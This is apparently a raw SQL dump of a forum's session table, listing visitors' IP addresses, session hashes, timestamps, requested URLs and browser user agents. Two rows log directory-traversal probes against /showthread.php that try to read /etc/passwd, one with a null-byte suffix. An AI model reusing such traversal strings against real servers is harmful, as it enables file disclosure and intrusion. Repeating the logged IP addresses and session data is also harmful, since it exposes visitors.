('b98f60e071dfe8404339008a5bef743a', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469837038, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('aaa344e5d777ff3c05d34e4c4f4baf0a', 0, '36.45.160.241', '3c2e2cb3032b8c79bf6a31498c460a8d', 1469846608, '/index.php', 'Mozilla/5.0 (Linux; U; Android 5.0.2; zh-CN; ALE-UL00 Build/HuaweiALE-UL00) AppleWebKit/534.30 (KHTM', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('52de7e174b51d099b9e8475d4931c100', 0, '207.46.13.77', '5e207e311e22cdc3b2095126a922fa93', 1469914290, '/faq.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('09e7f6edca0efdc831ffa7d35fcb686e', 0, '186.14.253.88', '6ee7d6075ec950a6c90d1c7124c96b09', 1469865783, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c8a4f640d44551a322593a5ab77bda95', 0, '217.78.56.153', '531ed624a426343a7a701d3db7613367', 1469866898, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('45d6629f1b6179d3b653b7092eec1f61', 0, '157.55.39.28', '23f3103f44bc3badcba53554e5e4cb6d', 1470119022, '/printthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1efd038c4231f803e3c7a37757c9f87c', 0, '157.55.39.247', '23f3103f44bc3badcba53554e5e4cb6d', 1469914280, '/showthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a4ce79e44a4e076c4691542d58c5e10a', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469880024, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('1c9a6e1fe9f8dd41ca86698b5335d542', 0, '95.187.49.13', '1470bb621ab2c4e4646b29830acf8b91', 1469882989, '/search.php?do=getdaily', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c7a607db9c044d7f12c20b3428a9aace', 0, '120.29.217.46', 'b4a0ec6bef5918b6021b70d73447e6fd', 1469892062, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f309cfc14c28deaa3990eddfde8da5fe', 0, '172.68.11.242', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1469893391, '/member.php?u=283', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('965324834796b8460bcdf4f636e7d36d', 164, '172.68.11.238', 'e4b01de3c86d9a1137ba127710bfa249', 1469896978, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safa', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('9fea1d463a23fbabb04cff0d2e5a7c74', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469922814, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('fa916ab7b408fe4aff587075e5f0e9a5', 0, '123.125.71.51', 'a0211c773de049272e2d2b929c7db941', 1469928764, '/index.php', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5962c786569705bd6cc84481076ee435', 0, '95.143.193.61', 'c675f6cabb9e0161ebdb1ea9b67f8d3f', 1469946199, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0e6156c42846c8687bd1a559b664587b', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1469965875, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7d2eab64c18dbc4bee04c199e95785f8', 0, '2605:e000:141b:', 'dbc70f2fc7b26c9465dbd59df1827964', 1469984162, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9f77592c753520236c99dc279c5563e6', 0, '41.44.208.109', 'b15abcee01669a8e3abcbc0f0c58ce0a', 1469986293, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%2500', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e14f691cbdcf966280229f4874924ed9', 0, '141.0.15.208', 'd90da803690d8378e00030cb394a466d', 1469992541, '/memberlist.php', 'Opera/9.80 (Android; Opera Mini/12.0.1987/37.8773; U; en) Presto/2.12.423 Version/12.16', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9aacec1e5a6f1321b8da369f841f562a', 0, '217.17.46.162', '1ac53d704a974e29c8be5c8b8b32420f', 1469998689, '/showthread.php?t=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6fe7f1320f32bd45617d0e4b8b4c4ad1', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1470008894, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('160efb71b28d54e14e2044d567e3c67e', 0, '201.171.158.57', 'b1a38e4da0b626432611d19ef34ae0e4', 1470030091, '/index.php', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9e3a3b568a9572545e4a0ad4a4a7dddc', 0, '123.63.166.181', 'caf25bdd912d14f92eac0f22a3e4edd1', 1470048035, '/register.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8fa884e4137e53982e7bb80817dc8055', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1470051584, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('3a8926314c41cfb05eb896d279d8eac3', 0, '172.68.10.242', '2f9052439b8db24c4107a6db23c187e2', 1470053649, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ef2583d38e850ea5b2c3618c5aa906c6', 0, '94.100.224.232', '93ca2d806670981c931be1afc780589a', 1470054226, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2e6d498f9cf88cdf52725030674b5a11', 0, '5.0.190.240', '5f70d0a757e5280e63ab0bf2f016acce', 1470065602, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f3b1389ef5e7d5879eefdb871b9c1348', 0, '210.50.85.55', '47e2e232c2b053c0c61ff03999585f0a', 1470456639, '/index.php', 'Mozilla/5.0 (Linux; Android 5.0; SM-G900I Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrom', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('29d2d3d2377762eb658a57c2bd08c8b5', 0, '36.45.166.42', '9a73a3836ed062b2d145e80355aa6251', 1470067904, '/index.php', 'Mozilla/5.0 (Linux; U; Android 5.0.2; zh-CN; ALE-UL00 Build/HuaweiALE-UL00) AppleWebKit/534.30 (KHTM', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('32d65617d8c4df76f397b16424a6efbc', 0, '157.55.39.69', '23f3103f44bc3badcba53554e5e4cb6d', 1470119028, '/member.php?u=387', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('65a26bbde365fd9255edff0b5b28b99e', 0, '105.101.216.78', '4e8828aab2811b28e6f41c427bc64739', 1470081961, '/index.php?', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b49409c4190a1e03bcfa67af6f94a89e', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1470094673, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('fed5254cde71e8bcb85db3acd63583b0', 0, '172.68.11.252', '027e5bb8cfa1223b1adb7daf059593ec', 1470114151, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c126d5668803258bbab27268463ed80f', 0, '157.55.39.123', '23f3103f44bc3badcba53554e5e4cb6d', 1470119012, '/misc.php?do=showsmilies', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f13c76123e00e2994ccd82350c0e56df', 0, '157.55.39.211', '23f3103f44bc3badcba53554e5e4cb6d', 1470119017, '/archive/index.php?pda=1', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('06213489670d5c1fcd974c23a68ba136', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1470137325, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('bc8374bcd2c371764cecd31225b35431', 0, '103.208.244.199', 'c0fb8d457e77fa38121133f174858169', 1470139357, '/index.php', 'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a6de58a4a84a9daee264504273f02414', 0, '91.78.230.66', '66e250dca269d8354a2e66cea79587b1', 1470155172, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 YaBr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b3e3c38539b313980d627829ba9f5e79', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1470180118, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7938178deb3c512a21f9be9d45168cd0', 0, '107.191.35.237', '985b5b01284bed139076942f25774e28', 1470180794, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d2681d744401e17a972b6195c3059269', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1470222881, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('bff78fed51ab69edeb342ddca879bb95', 0, '172.68.11.238', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1470224091, '/showthread.php?t=2366', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e929592d9e4db7b3000295a7f48e76bc', 0, '37.123.97.16', '9f8d053d30118c8307ee6de0cd699f2b', 1470231606, '/index.php', 'python-requests/2.10.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e8b4e75115094807cd695e6b1ad10120', 0, '108.61.123.85', '8fe12b8b473779733196d8b57eb45d79', 1470249254, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5e0dd34dae76893ce3658fa557fa52ff', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1470265801, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('cb6ab4ebfbbf571e16c95da6fcfe48e3', 0, '95.30.153.121', 'e27948b81ed98f7624a954d28fb0ac4d', 1470266113, '/memberlist.php', 'Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7511908896ea59768067b2e4dd56f9c9', 0, '41.190.2.191', '6dba80a7162219c3cb346b2f900b9d78', 1470267026, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1e221760a9c31d16bd0d18229c76634a', 0, '91.109.30.77', '5f8ddf4e422de3d7cceba61453801192', 1470267564, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('20ae356f45e13486cb48198f8b3e382b', 0, '172.68.34.82', 'a938925ca9403f145c82d10ebc1ecbe1', 1470305626, '/search.php?searchthreadid=1856', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0d87fa373678659058f67e67e22f8d21', 0, '110.174.100.239', 'c6abee647c5b55927fb844f730ac8431', 1470294775, '/showthread.php?t=1866', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e133353a458697df192b811182a2b907', 0, '172.68.34.92', 'a938925ca9403f145c82d10ebc1ecbe1', 1470306815, '/archive/index.php/t-2461.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('1b96669d82aa010b476d4668f82c0884', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470309094, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7cdd1186335edc1b74978a2e87c19915', 0, '172.68.59.141', 'a938925ca9403f145c82d10ebc1ecbe1', 1470318814, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('10be4376a719472fbfba051bf5c0ce9b', 0, '193.255.135.254', 'ab84f35d0d858d2582e362d67e654f77', 1470310836, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ab549ab4d306f1dec60d4409603ee6a8', 0, '66.249.69.151', 'a938925ca9403f145c82d10ebc1ecbe1', 1475036446, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b2603ec2a96c232db4405aa09724236c', 0, '172.68.58.233', 'a938925ca9403f145c82d10ebc1ecbe1', 1470396586, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4d8955a6a637772639da6771e5aabc1e', 0, '172.68.59.160', 'a938925ca9403f145c82d10ebc1ecbe1', 1470311765, '/showthread.php?t=2386', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e2159482fd26591ded10c49e3eae9375', 0, '172.68.59.182', 'a938925ca9403f145c82d10ebc1ecbe1', 1470312860, '/archive/index.php/f-39.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('92426eed5cb95cd909e2f47969be2e8b', 0, '172.68.59.177', 'a938925ca9403f145c82d10ebc1ecbe1', 1470315434, '/faq.php?faq=vb3_board_faq', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a6c00a0e369e34a3d9c2d3540015bc08', 0, '172.68.59.146', 'a938925ca9403f145c82d10ebc1ecbe1', 1470329109, '/archive/index.php/t-2317.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('485ceda4a3d90257f2fe7dbb28fdddd4', 0, '66.249.69.145', 'a938925ca9403f145c82d10ebc1ecbe1', 1472478192, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5894d4286552a7df73b9f5e5c3af91c0', 0, '62.210.14.241', 'c232a9b83ee96e97db0dbe3f9f02d96e', 1470326523, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('20e7687de25f762b7fbcef780ec219f3', 0, '66.249.69.148', 'a938925ca9403f145c82d10ebc1ecbe1', 1470328932, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('37eee1f58fce5dd9bfbc62223795b183', 0, '172.68.58.233', '37a60411c341250cf0113f4eba911963', 1470340868, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a87c13277a6ad7d5c0ac9fb014ca045b', 0, '41.190.14.44', '242d7f9cbe3c9acd265f1abf6db9adcb', 1470341247, '/register.php', 'Mozilla/5.0 (Linux; Android 4.2.2; Infinix X1000 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('38fc7d9f6d8775cdaecd30ddd87f052c', 0, '172.68.59.163', 'a938925ca9403f145c82d10ebc1ecbe1', 1470343726, '/search.php?searchthreadid=2234', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c2f41b7cb5493e1e7a510f67d829d3bb', 0, '172.68.59.147', '37a60411c341250cf0113f4eba911963', 1470345585, '/search.php?searchthreadid=1835', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('316ea02b74c4f82c86c2a7b780064697', 0, '207.46.13.12', '5e207e311e22cdc3b2095126a922fa93', 1470346807, '/archive/index.php/f-35.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('e6054e6fab2a552c2b09aa3361ae7209', 0, '157.55.39.76', '23f3103f44bc3badcba53554e5e4cb6d', 1474565840, '/printthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ade9735c6117ef14e92e3a86263d8d0c', 0, '157.55.39.237', '23f3103f44bc3badcba53554e5e4cb6d', 1470346833, '/forumdisplay.php?f=37', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('601d1630bd14116d9499427e13817e2a', 0, '172.68.10.206', 'dd3a02b182b642c96b254907e07f9860', 1470350475, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bcae2e69c158c1da9a2fd03388ba968f', 0, '66.249.69.154', 'a938925ca9403f145c82d10ebc1ecbe1', 1474472336, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7b11ce4a37b1c95f20a04274dae3554a', 0, '172.68.59.141', '37a60411c341250cf0113f4eba911963', 1470365869, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b914ce3b7389476933dfcca2c9fdf835', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470352342, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('376662aa982e171464651b3aa2fec223', 0, '46.19.137.78', '616926600b8edb15267ad9cf15142670', 1470353793, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e6362692bf40f09beba5f3db35b1d777', 0, '185.100.85.101', '9ac68a074e539196855e69e871614a2a', 1470359200, '/login.php?do=logout&logouthash=1470359196-8da0fb7a2a46613143562d83596a53e1f2ff347f', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('769fa707cb3427bb5a360249d2b3aa40', 0, '105.112.22.50', 'f1c56280ed6166ff1fa18f8b07c755f4', 1470366562, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('992bb5b26e0163b6ba1cc9caf9c3e835', 0, '2605:e000:141b:', '3016706ccac5c05b28e5defd0163c1f5', 1470370258, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9d34075cf247b149f8e6348e3a4cb2fd', 0, '52.23.162.115', 'aced0332ee76334aa32b0bbae50c7e8e', 1470371655, '/index.php', 'ltx71 - (http://ltx71.com/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('18bb93d06957f1d21bc3e2d1977ec3d6', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470395314, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('fca4087d1312afd1f2bbbdfed7d79ac9', 0, '109.159.23.245', '9b4e366e04c345b7abf4377e66ea9b47', 1470999503, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7ef9dc9b1f19d71a0880864f58e0d5a5', 0, '162.216.7.112', '372a24f9c541ef0a6f2f636e35841d14', 1470417499, '/search.php?do=getnew', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('32f34c4326b83f43cac9dc31ea85273e', 0, '62.210.14.241', '349f9496d98c20fc434dda4114bb760b', 1470422274, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/36.1.1.21 Chrome/36.0.198', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6452d00d0521f06665eae03a9c492f45', 0, '165.231.99.204', '3acf55034855732bc1d32ce7dbcab290', 1470420388, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/36.1.1.21 Chrome/36.0.198', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9d6ac8745c8fe759c15568c7688e88e5', 0, '151.237.177.73', 'f000523c38142b617dacdce66559b529', 1470422276, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/36.1.1.21 Chrome/36.0.198', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eb043e9df8cc5764654ef905dfa2a95f', 0, '103.10.197.61', 'caa33035eb0873f84bfdb68049040ef5', 1470428041, '/showthread.php?p=2801', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e9dd4e98f26982d5bf58f4b6b805147e', 0, '167.206.247.250', 'dcd2f25115461b9a0207ec9f04d037f0', 1470437423, '/index.php', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('232bf15f79e925388cb4f55e11037942', 0, '199.254.238.222', 'dcbd26278117a27c3c197bb2026d17fe', 1470447136, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/600.5.17 (KHTML, like Gecko) Version/8.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('784b04d15309315781d52f911d07b660', 0, '172.58.152.140', '452c8ecd029b072436ae5fb9c9332ece', 1470449290, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8de78bc5849cd8ca6081d77e30562f66', 133, '172.68.59.31', '6e9dca07b2c2f4e35c2c80298e236a58', 1470452673, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a98b7b30dc4556ebaea701cc24d42f4e', 0, '172.68.11.206', '4d849f862b3b0a1e58d787c5b396809f', 1470453262, '/search.php?do=process&do=process', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8ee324fd24094f7f6da4a9a1fe6cf95d', 0, '136.243.227.137', '51d1c3be83149630002476323330f661', 1470464726, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3b1336deb8d3f8cd70549068b75caddc', 0, '85.26.235.10', 'ce78a97a1b0e0bcfc3b076b644912406', 1470474964, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9fee87192fd8b9b6c79b581132eb69bf', 0, '109.241.150.20', '8f2aed806d405262b193a2fdfa3a1d42', 1470487202, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
